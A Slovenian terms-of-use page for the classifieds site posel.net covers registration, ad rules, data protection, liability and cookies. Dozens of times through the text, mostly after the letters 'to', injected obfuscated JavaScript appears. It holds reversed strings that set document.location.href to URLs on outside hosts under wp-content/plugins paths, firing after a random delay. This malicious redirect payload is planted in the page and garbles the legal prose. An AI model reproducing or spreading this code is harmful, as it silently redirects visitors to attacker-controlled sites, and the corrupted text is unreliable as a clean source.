Pogoji uporabe

Za uporabo spletnega mesta posel.net se mora uporabnik strinjati s Pogoji uporabe spletne strani posel.net. Sprejem pravil je pogoj za registracijo in objavo oglasov na spletnem mestu. Če se s tem ne strinja, mora prenehati uporabljati spletno stran www.posel.net.

Spletno mestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to posel.net je posrednik med kupci in prodajalci.

Pred objavo oglasa se mora uporabnik registrirati in mora biti na datum registracije star 18 let ali več. Uporabnik mora ob registraciji izpolniti zahtevana polja, ki so označena z zvezdico (*). Podatke za dostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top do spletnega mesta posel.net mu bodo poslani preko elektronske pošte. Uporabnik mora izpolniti vsa zahtevana polja z resničnimi podatki. Izdajanje za drugo osebo je kaznivo dejanje. Vsak uporabnik ima lahko le eno uporabniško ime. Uporabnik se s sprejemom pravil  zavezuje, da bo ravnal skladno z njimi.

Upravljavec spletnega mesta posel.net vsem obiskovalcem in registriranim uporabnikom nudi strokovno in tehnično pomoč uporabe spletnega mesta, in sicer kadarkoli preko elektronske pošte ($NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to:info@posel.net”>info@posel.net).

Vsak uporabnik spletnega mesta posel.net s sprejemom teh pravil dovoljuje uporabo in obdelavo posredovanih osebnih ter drugih podatkov za namen delovanja spletnega mesta posel.net, pošiljanje elektronske pošte v skladu z naslednjo toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}točko teh pravil. Upravljavec se zavezuje te podatke uporabiti le za namen, za katerega so bili pridobljeni. Uporabnik je z opravljeno registracijo seznanjen z ravnanjem z osebnimi podatki ter soglaša, da upravljavec njegove osebne podatke obdeluje in hrani do njegovega preklica. Podatki o uporabniku se obdelujejo in hranijo na način in v roku s specifičnim ter legitimnim namenom. Upravljavec jamči za zasebnost osebnih podatkov in z njimi ravna v skladu z Zakonom o varstvu osebnih podatkov (ZVOP-1). Upravljavec osebnih podatkov je upravljavec in lastnik spletnega mesta posel.net. Upravljavec osebnih podatkov ne bo posredoval tretjim osebam, razen v primerih, ko bo toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to potrebno za namen delovanja spletnega mesta posel.net. Upravljavec bo podatke o oglasu posredoval tretjim osebam, v kolikor bo toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to potrebno za namen delovanja spletnega mesta posel.net. Upravljavec spletnega mesta posel.net si pridržuje pravico do posredovanja podatkov o uporabniku ali oglasu državnim organom, v kolikor bi le ti zoper posameznega uporabnika vodili postoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topek zaradi suma kršitve veljavne zakonodaje.

Uporabnik, ki opravi registracijo na spletnem mestu posel.net, se strinja s prejemanjem elektronske pošte, ki je povezana s spletnim mestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom in aktivnostmi posel.net. Ta sporočila lahko vsebujejo reklamna sporočila poslovnih partnerjev Upravljavca. Uporabnik lahko kadarkoli zahteva, da upravljavec trajno ali začasno preneha uporabljati njegove osebne podatke za pošiljanje reklamnih sporočil. Za odjavo od prejemanja teh sporočil je potrebno v prejetem elektronskem sporočilu klikniti na gumb ODJAVA, pri čemer bo Upravljavec v 15 dneh od prejema obvestila o odjavi ustrezno onemogočil uporabo osebnih podatkov za namen neposredne pošte. Odjava velja za vsa elektronska sporočila, razen za tista, ki so povezana z delovanjem spletnega mesta posel.net ali  z zagotavljanjem stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toritve Upravljavca. Uporabnik izrecno soglaša, da upravljavec obdeluje in uporablja njegove osebne podatke, ki  jih je ali jih bo prostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovoljno posredoval za namen uporabe stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toritev ter izrecno soglaša, da upravljavec njegove zbrane podatke uporabi za namene neposrednega trženja do njegovega  preklica v skladu z Zakonom o varstvu osebnih podatkov.

Spletno mestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to posel.net, njen upravljavec in lastnik ne odgovarjajo za resničnost oddanih oglasov in njihovo vsebino. Za objavljen oglas, vključno s fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografijami, povezavami in tekstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom, je izključno odgovorna oseba, ki ta oglas odda.

Objava  oglasov je brezplačna.

Uporabnik spletnega mesta posel.net se zavezuje, da bodo njegovi vsebinski in slikovni oglasi resnični; da ne bo oglaševal vsebine, katerega promet in/ali oglaševanje je z zakonom prepovedan. V primeru suma stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toritve kaznivega dejanja ali drugih kršitev veljavne zakonodaje, si upravljavec pridržuje pravico do sodelovanja s pristoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tojnimi organi. Uporabnik se zavezuje, da ne bo objavljal oglasov, ki so v nasprotju z veljavnimi zakoni, drugimi predpisi in Ustavo Republike Slovenije ter da bo pri svojem oglaševanju spoštoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toval Slovenski oglaševalski kodeks (SOZ). Uporabnik v svoje oglase ne sme prepisovati ali kopirati vsebin iz oglasov drugih uporabnikov.

Oglasi morajo biti napisani v slovenskem jeziku.

Uporabnik se obveže, da ne bo objavljal oglasov za koga drugega, brez njegovega soglasja.

Oglas mora vsebovati specifične podatke o poslu/predmetu, ki se prodaja. Opis se mora nanašati zgolj na predmet/posel prodaje. V oglasih ni dovoljeno oglaševati drugih predmetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov ali poslov ali česarkoli, kar ni neposredno predmet prodaje. Uporabnik posameznik lahko pri oddaji oglasa izbere  ali želi izpis poštne številke, telefona oz. elektronske pošte. V primeru, da vnese poštno številko, telefon in elektronski naslov se šteje, da se strinja z njihovo objavo skupaj z oglasom. Pri oglasih, ki jih objavi uporabnik, znesek, ki je naveden v oglasu, predstavlja končno in zavezujočo ceno. Navedba cen, ki predstavljajo le del celotne cene, ni dovoljena.

Fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografije v  oglasu morajo biti fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografije posla/predmeta, ki se prodaja. Ni dovoljena objava enake fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografije v večih oglasih. Objava pasic in ostale oglaševalne vsebine v oglasih ni dovoljena.

Oglas mora vsebinsko pripadati v primerno kategorijo.

Uporabnik lahko za isti posel/predmet odda samo en oglas. Prav tako ni dovoljena objava oglasov za isti predmet v različnih kategorijah.

Prepovedano je objavljanje oglasov, ki bi lahko pomenilo objavljanje potrebe po delu, nudenje dela ali zaposlovanja na črno oziroma delo na črno po Zakonu o preprečevanju dela in zaposlovanja na črno (ZPDZC-1). Uporabnik se z oddajo oglasa zavezuje, da bo priskrbel ali zahteval registracijo ali priglasitev dejavnosti po določbah ZPDZC-1. Upravljavec si v primeru, ko iz oglasa izhaja, da bi vsebina lahko pomenila objavljanje potrebe po delu, nudenje dela ali zaposlovanja na črno oziroma delo na črno, pridržuje pravico, da takega oglasa ne objavi. V skladu z ZPDZC-1 je upravljavec dolžen organom pregona na njihovo zahtevo posredovati podatke o lastniku oglasa.

Prepovedano je oglaševanje ukradenega in ponarejenega blaga. Ponarejeno blago je blago, ki je brez dovoljenja imetnika znamke označeno z znamko ali znakom, ki ga po bistvenih lastnostih ni mogoče razlikovati od te znamke.

Oglas, ki vsebuje posebno ponudbo (kot npr. popust, darilo, …) mora imeti jasen opis te posebne ponudbe v besedilu opisa oglasa. Slik v oglasu ni dovoljeno označevati s posebno ponudbo. Posebna ponudba ne sme biti zavajajoča. Ponudnik mora v oglasu s posebno ponudbo nevesti, kje si lahko uporabnik prebere pogoje za pridobitev ugodnosti oz. pridobi dodatne informacije v zvezi s posebno ponudbo.

Z oddajo ponudbe na posamezni oglas in sprejemom ponudbe s strani uporabnika, ki je oglas objavil, se med prodajalcem in kupcem vzpostavi obligacijsko razmerje. Vsi morebitni spori iz tega razmerja (kot zaradi resničnosti podatkov o uporabniku, o vsebini ponudbe, o poslu/predmetu in ceni ponudbe …) se rešujejo izključno med prodajalcem in kupcem. Prodajalci in kupci na spletnem mestu sprejemajo način trgovanja, ki je značilen za splet in je tako v določeni meri anonimen. Upravljavec spletnega mesta ne prevzema odgovornosti v primerih, ko bi kateri od uporabnikov posredoval nepopolne ali neresnične identifikacijske podatke. Prodajalci in kupci s sprejemom Pogojev uporabe spletnega mesta posel.net, z odločitvijo poslovanja preko spleta, prevzamejo tveganja povezana z verodostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tojnostjo identitete  posameznega uporabnika spletnega mesta ter odgovornost za posledice, nastale pri poslovanju preko spleta. Upravljavec ne nosi nikakršne odgovornosti v primeru spora med uporabniki. Kontaktni obrazec pri posameznem oglasu je namenjen samo povpraševanju glede konkretne ponudbe.

Kontaktni obrazec pri posameznem oglasu je namenjen izključno povpraševanju glede konkretne ponudbe. Pošiljanje sporočil  s kakršnokoli drugo vsebino ni dovoljeno.

Upravljavec si pridružuje pravico izbrisa oziroma neobjave oglasa, če meni da bi objava takšnega oglasa škodovala spletnem mestu posel.net – presojo o tem si upravljavec v celoti pridržuje. Upravljavec spletnega mesta posel.net si tudi pridržuje pravico, nemudoma črtati s seznama uporabnikov tiste, ki bi kršili ta pravila ali kako drugače škodovali spletnemu mestu posel.net, njenim upravljavcem oziroma lastnikom. Presojo o tem si upravljavec v celoti pridržuje.

Uporabnik je dolžan skrbeti za varnost svojega uporabniškega imena  in gesla. posel.net ne odgovarja za primere zlorabe uporabniškega gesla, bo pa nemudoma po sporočilu uporabnika o domnevni zlorabi ustrezno ukrepal. Uporabnik se strinja, da se v primeru, če se izkaže, da je bilo uporabniško ime in geslo kateregakoli uporabnika zlorabljeno, ponudbe ali povpraševanja in druge izjave volje pod imenom tega uporabnika, ne štejejo za izjavo volje in tako v nobenem primeru ne povzročijo pravnih učinkov.

Z objavo oglasa na posel.net, se uporabnik strinja, da bo vestno odgovarjal na povpraševanja drugih uporabnikov (bodisi po telefonu ali preko elektronske pošte). Uporabnik mora imeti aktiven elektronski naslov, kjer periodično pregleduje poštoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to.

Vsebina spletnega mesta posel.net je avtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torsko pravno zaščitena, zatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je kopiranje, uporaba kateregakoli dela spletnega mesta www.posel.net, vključno z vsemi podatki, ki jih priskrbijo uporabniki ter vključevanje v drugo spletno stran, brez vnaprejšnjega pisnega dovoljenja upravljavca, prepovedano.

Uporabnik spletnega mesta lahko kontaktira drugega uporabnika spletnega mesta posel.net preko spletnega mesta posel.net zgolj z namenom konkretnega povpraševanja in informiranja o poslu/predmetu iz oglasa. Uporabniku ni dovoljeno kontaktirati drugih uporabnikov spletnega mesta posel.net za reklamiranje stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toritev ali izdelkov.

Vsak uporabnik spletnega mesta sprejema te pogoje ter se izrecno odreka pravici izterjave morebitne odškodnine od upravljavca spletnega mesta posel.net, nastale iz zgoraj navedenega razmerja med prodajalcem in kupcem.

Upravljavec si pridržujejo pravico, nemudoma izbrisati  tiste uporabnike, ki bi kršili ta pravila ali kako drugače škodovali spletnem mestu posel.net, njenim upravljavcem oziroma lastnikom. Presojo o škodljivosti si upravljavec v celoti pridržuje.

Upravljavec/lastnik ne odgovarja za kakršnokoli posredno ali neposredno škodo, vključno z morebitnim izgubljenim dobičkom, ki bi nastala zaradi prekinitve dostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topa, ne objave oziroma izbrisa oglasa ali napak v delovanju spletnega mesta, kot tudi ne jamči za uspešnost uporabe tega spletnega mesta. Vsebina in funkcionalnost tega spletnega mesta so ponujene ‘takšne kot so’. Upravljavec/lastnik ne odgovarja za škodo, ki bi izvirala iz uporabe oziroma nezmožnosti uporabe tega spletnega mesta, vključno in brez omejitev glede izgubljenega prihodka ali pričakovanega dobička, izgube dobrega imena, izgube poslov, izgube podatkov, računalniške napake ali napačnega delovanja oziroma drugih škodnih dogodkov, razen, če bi do omenjenega dogodka prišlo zaradi naklepnih ali malomarnih ravnanj upravljavca, z namenom škodovanja uporabniku. posel.net si pridržuje pravico, da kadarkoli, iz razlogov poslovanja, brez predhodnega obvestila, prekine zagotavljanje portala posel.net.

Upravljavec spletnega mesta posel.net si pridržuje pravico, da bo spreminjal funkcionalnost spletnega mesta in uporabniške izkušnje, kar lahko povzroči premik oglasa oziroma toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, kako ga uporabniki najdejo. posel.net ne jamči, da bo uporabnik lahko dostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topal do vsebine svojega oglasa, ko ta enkrat poteče. Zatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je priporočljivo, da uporabnik sam pri sebi shrani vsebino in fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografije oglasa, če jih bo želel kasneje uporabiti v kakšnem drugačnem kontekstu.

Namestitev piškotkov na spletnem mestu posel.net je urejena v skladu z  Zakonom o elektronskih komunikacijah (Ur. l. RS, št. 109/2012; »ZEKom-1«), ki upošteva Direktivo o zasebnosti in elektronskih komunikacijah (2002/58/ES). Upravljavec spletnega mesta bo shranjeval ali pridobival dostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top do podatkov, shranjenih v terminalski opremi uporabnika  pod pogojem, da je uporabnik v toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to privolil. Pred tem je uporabnik jasno in izčrpno obveščen  o upravljavcu in namenih obdelave teh podatkov. Soglasje uporabnika, ki je podano svobodno in izraža njegovo voljo, upravljavec spletnega mesta pridobi preden se piškotek namesti oziroma se zberejo podatki uporabnika; na podlagi obvestitve uporabnika o pošiljanju in namenu piškotka. Uporabnik je na spletnem mestu posel.net obveščen, katere informacije se nameravajo shraniti v piškotku, s kakšnim namenom in kakšno je obdobje veljavnosti piškotka, ki ga bo sprejel. Uporabnik je seznanjen, da bo piškotek ponudniku oglaševanja omogočal zbiranje podatkov o obiskovanju drugih spletnih mest, prikazanih oglasov, ipd., uporabniku je podana razlaga o piškotku ter njegovi uporabi ter informacija o poteku spremljanja preko piškotkov. Odločitev o sprejemu piškotka je na strani uporabnika. Za uporabnikov sprejem  piškotka se šteje jasna privolitev (označitev), ki jo uporabnik lahko poda ob uporabi spletnega oglasnika posel.net, ob registraciji uporabniškega profila, pri prijavi ali objavi oglasa ali z jasno izraženim konkludentnim dejanjem. Dejstvo, da je uporabnik sprejel piškotek, se šteje kot veljavno soglasje tudi za poznejše zbiranje podatkov, ki izhajajo iz tega piškotka. Upravljavec spletnega mesta bo uporabnike spletnega mesta obvestil o tem, da poteka spremljanje preko piškotkov.

Upravljavec  spletnega mesta posel.net si pridržuje pravico, da lahko kadarkoli spremeni te Pogoje uporabe spletne strani posel.net.

10.2.2018